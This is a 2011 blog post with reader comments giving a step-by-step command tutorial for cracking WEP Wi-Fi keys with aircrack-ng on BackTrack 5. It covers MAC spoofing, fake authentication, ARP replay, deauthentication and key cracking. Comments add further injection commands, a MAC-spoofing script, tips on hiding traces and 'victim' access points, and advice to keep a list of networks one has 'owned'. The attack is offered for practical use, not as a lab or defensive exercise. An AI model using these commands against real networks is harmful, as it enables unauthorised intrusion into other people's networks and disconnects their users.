XeoShift

Changing how ITs done

Home

How to crack WEP with BackTrack 5

Posted by Sean McCall on June 1, 2011 at 3:05 PM

1.)  Start monitor mode:

airmon-ng

        Copy down interface

airmon-ng start (interface)

        If it says "mon0" or"wifi0" is used, this is your new interface

        If it says other things are running, type "kill (PID#)" for each

 

2.)  Injection test:

aireplay-ng -9 (interface)

        The APs that send pings back can be injected

        Copy down your targets BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

        This lets you test specifically, can beuseful for verifying hidden SSIDs or alternative BSSIDs

 

3.)  Target a specific channel:

airmon-ng start (interface) (channel)

 

4.)  Change MAC:

airmon-ng stop (interface(s)

ifconfig (interface) down

macchanger--mac (faked:mac) (interface)

        Copy down faked:mac

 

5.)  Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

        Keep an eye out for authenticating client’s MACs under Station

        If found & step 6 isn’t going well, go back to step 4 and use that MAC

        You may have to stop the monitoring interface & the physical one

 

6.)  Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

        Successful authentication will continually send keep-alive packets

        Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

 

7.)  ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)


8.)  Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

        Minimum around 10,000 to 20,000 IVs are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit

        Try "aircrack-ng -n 64 (dump-name)*cap"every 10,000 IVs

        If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters

        If key bytes are all numbers, try running with "-t" to assume an all numeric key

        Add -x2 to brute force the last 2 bytes

        If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

        Retry with the fudge factor increased by4 more if that’s unsuccessful

        If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

        Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes


*    Other attack methods:

Injection attack with 2 wireless cards:

        aireplay -9 -i (receiving interface) (injecting interface)

                If fails on Attack -5, make sure the injection interface MAC matches the current card MAC

 

Deauthentication attack:

        aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

                Can be faster than an ARP replay, but you must know an authenticated client's MAC who’s online

                This will disconnect the authenticated client, so they may be suspect

Categories: None

Post a Comment

Oops!

Oops, you forgot something.

Oops!

The words you entered did not match the given text. Please try again.

Already a member? Sign In

15 Comments

Reply Shade Emry
9:02 PM on November 22, 2011 
Nicely Done
Reply Scorpion
7:44 PM on March 2, 2012 
four pid came out when i tried to start airmon-ng and even thought that i killed all of them there is always one that stays and dont let me start the airmon. can anyone help me with that .
Reply dileep
12:45 AM on April 29, 2012 
Hi thanks for the post.When i type "airmon-ng" nothing shows up.but i'm connected to the router
Reply Sean McCall
3:22 PM on April 30, 2012 
You shouldn't have DHCP services running, much less be connected to the router you're trying to crack...
Reply Arvind
1:04 PM on May 11, 2012 
dileep says...
Hi thanks for the post.When i type "airmon-ng" nothing shows up.but i'm connected to the router

you have to type airmon-ng wlan0 , where wlan0 is your network adapter.
Reply wifreenitum
5:22 PM on June 13, 2012 
About step 4. Change MAC: airmon-ng stop (interface(s) ifconfig (interface) down macchanger--mac (faked:mac) (interface). You don't need to use airmon-ng stop (interface) before changing mac, just ifconfig (monitor_interface) down.
Fudge factor is completely unnecesary and neither is brute forcing last bytes with latest versions of aircrack(1.0/1.1).Nice tips for varying aircrack behavior though
like if you know start of key.
Know your tools.
Reply Sean McCall
7:42 PM on June 13, 2012 
wifreenitum says...
About step 4. Change MAC: airmon-ng stop (interface(s) ifconfig (interface) down macchanger--mac (faked:mac) (interface). You don't need to use airmon-ng stop (interface) before changing mac, just ifconfig (monitor_interface) down.
Fudge factor is completely unnecesary and neither is brute forcing last bytes with latest versions of aircrack(1.0/1.1).Nice tips for varying aircrack behavior though
like if you know start of key.
Know your tools.


Thanks, I have quite a few revisions to make to this, I didn't think it would become a top Google result. I think I might make a Youtube video demonstrating the chop-chop & fragmentation attack methods in addition to the basics.
Reply marcos
7:48 PM on June 13, 2012 
My tried and true way to crack most wep-based APs.
Step 1 is OK and nice tip about killing pid responsable for wifi interface in use.
If driver is ath9k client-mode interface is wlan0 but sometimes it's some high number like wlan17 but that's a bt5 bug not present in older version or could be driver issue. Also power reading are different and changing txpower is restricted also for rtl8187 and atheros.
I use yakuake because i can copy/paste to a template of commands and replace bssid, essid, and channel in all commands using kwrite and the copy those commands and reveal yakuake with F12 and paste the commands in the console. It's almost as fast as using some spoonfeader app like gtk-wep in beini. Select text to replace throughout template, Ctr l C, Ctrl R, paste text to replace and enter twice. Open 3 tabs with the ctrl +n or ctrl+t depending on version or setup of yakuake.
1) Check wifi interfaces: (rmmod unneeded cards by their driver name as listed in lsmod command if you are using an external usb adapter like an alpha rtl8187 or similar generic wifi adapter.
iwconfig
2) Start monitor mode: (injection test is fine but in mexico prodigy infinitum isp is own3d and completely injectable.
airmon-ng start [interface returned from iwconfig in step one]
Make note of monitor interface.
3) Do inicial scan for victim access points:
airodump-ng mon0
Copy down your target's BSSID, channel & ESSID
4) Change channel of monitor interface to channel target access point:
iwconfig mon0 channel [channel_of_target_ap]
5) Lower bit rate to 1 Mbit increase recieve quality (see RXQ in manpage for airodump-ng:
Basically this allows more packets to get through to the AP if it's set to 54bit and you are further away or in a bad position or if interfering APs are nearby. This also increases injection rate and chance od success when doing the fake authentication step.
iwconfig mon0 rate 1M
6) Change mac of monitor interface (optional but recomended especial for hiding your traces or spoofing a client mac if mac filtering is enabled on the AP. You can make a script to avoid typing too much.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
Ifconfig mon0 up
Make a small script and put step 4-6 in one command
nano macspoof
#start of script
iwconfig $1 channel $2
ifconfig $1 down
macchanger -m $3 $1
ifconfig $1 up
iwconfig $1 rate 1M
#end of script
Make script executable:
chmod +x macspoof
Ej. macspoof [interface] [channel_of_victim_AP] [faked_mac]
7) Begin packet capture in first terminal window or tab in yakuake:
airodump-ng -c (channel) -w (a dump-name like capture) --bssid (BSSID) (monitor interface which in this case is mon0)
If the essid is hidden you can do a deauth on a client in range connected to the AP.
aireplay-ng -0 5 -a (BSSID) -c (mac_of_client_to_be_kicked) (interface)
you can simultaneously capture and deauth just repeat step 2 with airmon-ng and create a second monitor interface like mon1 and use that instead of mon0. Which is being used by airodump-ng while capturing packets.
8) Fake authentication:
*Put in second shell or tab in yakuake*
aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)
Successful authentication will continually send keep-alive packets.
Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers.
9) Use the easy injecting 0841 attack (in another tab of yakuake):
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (BSSID) -h (faked:mac) (interface)
If the AP uses migration mode (in airodump_ng the AP appears as 54e under the MB column) use this command in the same tab (aircrack version 1.1):
aireplay-ng -8 -b (BSSID) -h (faked:mac) (interface)
When a packet is recieved, type y the enter and injection will begin.
10) Crack the WEP key. In another terminal window or yakuake tab type:
aircrack-ng -b (BSSID) -Z capture*.cap
Or if cracking an AP using migration mode (54e):
aircrack-ng -a 1 -b (BSSID) -z capture*.cap

You should see the key in hex or asci format at the end of about 20000 to 23000 packets or less for I've never had to wait that long.

You should keep a list of all the networks you know 0wn. Using nano in another terminal window copy paste revelant data from airodump and then the key at the end.
I hope I have enlightened anyone or helped out with my tips.
Beini also is pretty good with 11e/54e (wep/wpa migration networks. It's worth a try for noobs.
Reply Sean McCall
8:06 PM on June 13, 2012 
marcos says...
tl;dr (Jk, I did, just wanted to shorten the quote)

I'll be sure to test some of this, and then do what I did above AKA translate into an easy, step by step tutorial that anyone could use. I appreciate you taking the time to share your methods, it sounds like you do this a little more than I do. I originally wrote this for myself as I tried to translate similar write-ups. After the effort, I figured it was worth sharing ^^
Reply wifreenitum
6:22 PM on June 14, 2012 
Sean McCall says...
I'll be sure to test some of this, awnd then do what I did above AKA translate into an easy, step by step tutorial that anyone could use. I appreciate you taking the time to share your methods, it sounds like you do this a little more than I do. I originally wrote this for myself as I tried to translate similar write-ups. After the effort, I figured it was worth sharing ^^


I also like to use my galaxy epic to pin point closer networks because of it's less powerfull wifi. It makes things faster and smoother to lower the bit rate on the crack and once you get access modify the configuration of the bit rate on the wireless router/AP also. That way your wireless adapter is always forced to connect at that rate and gives better range/immunity to interference and improves throughput to the internet although not between machines om a local network while sending files. If you just use internet and don't need the high internet network bandwidth then lower the wifi bit rate to your maximum internet download bandwidth assigned by your providee.
Reply serin
9:53 AM on July 20, 2012 
i am getting just 3 ivs in an hour . somebody please help
Reply Federico
1:40 PM on August 25, 2012 
A bash script to automate the WEP cracking process can be found on:
http://pastebin.com/ga8t9fz7
Reply emmi
10:42 AM on September 26, 2012 
i need this softwere
Reply Sean McCall
11:26 AM on September 26, 2012 
emmi says...
i need this softwere

It's available in the Download's section along with many other useful applications ;)
Reply MMMMM
5:15 AM on July 25, 2013 
what is dump-name and faked:mac...i didn't know what the are